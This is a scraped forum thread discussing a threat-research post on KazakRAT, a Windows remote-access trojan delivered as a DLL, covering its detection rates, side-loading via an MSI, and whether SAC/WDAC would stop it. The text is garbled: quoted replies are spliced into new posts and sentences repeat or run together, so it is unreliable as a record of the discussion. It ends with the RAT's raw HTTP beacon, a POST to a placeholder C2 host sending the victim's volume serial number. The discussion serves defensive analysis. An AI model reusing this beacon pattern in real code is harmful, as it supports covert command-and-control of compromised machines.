- Content source
- https://ctrlaltintel.com/threat%20research/KazakRAT/
Attack on *stan: Your malware, my C2
Suspected state-affiliated actor targets Afghan and Kazakh entities
However, undiscovered for years, until recently!The KazakRAT binaries themselves were not obfuscated making it simple to analyse. C2 communications are unencrypted and follow a simple beaconing mechanism over HTTP.
U will be shocked to see the VT detections when u check IOCs hashes.However, undiscovered for years, until recently!
I have; detected by most vendors, but it looks it's a recent detection.U will be shocked to see the VT detections when u check IOCs hashes.
the post was out on 21st so yeah they had time. I found the post just nowI have; detected by most vendors, but it looks it's a recent detection.
Interesting article; have read it from top to bottom.the post was out on 21st so yeah they had time. I found the post just now
Was the DLL delived as a side-load after executing the msi file?During our tracking we identified a Windows-based RAT, delivered as a DLL, that we have coined KazakRAT.
unsigned so yeah dll hijacking shouldn't be successful here. The msi i shared on other thread is a signed exe with valid cert so that could be curtains for sac/wdac but i have not tested it yet. I was interested if Andy has the answer.Was the DLL delived as a side-load after executing the msi file?
Would the attack be aborted if they have SAC/WDAC on?
Indeed; a suitable scenario for auditing SAC/WDAC.unsigned so yeah dll hijacking shouldn't be successful here. The msi i shared on other thread is a signed exe with valid cert so that could be curtains for sac/wdac but i have not tested it yet. I was interested if Andy has the answer.
POST /as/include.php HTTP/1.1
Host: [C2_HOST]
Content-Type: application/x-www-form-urlencoded
...
id=[VolumeSerialNumber_Hex]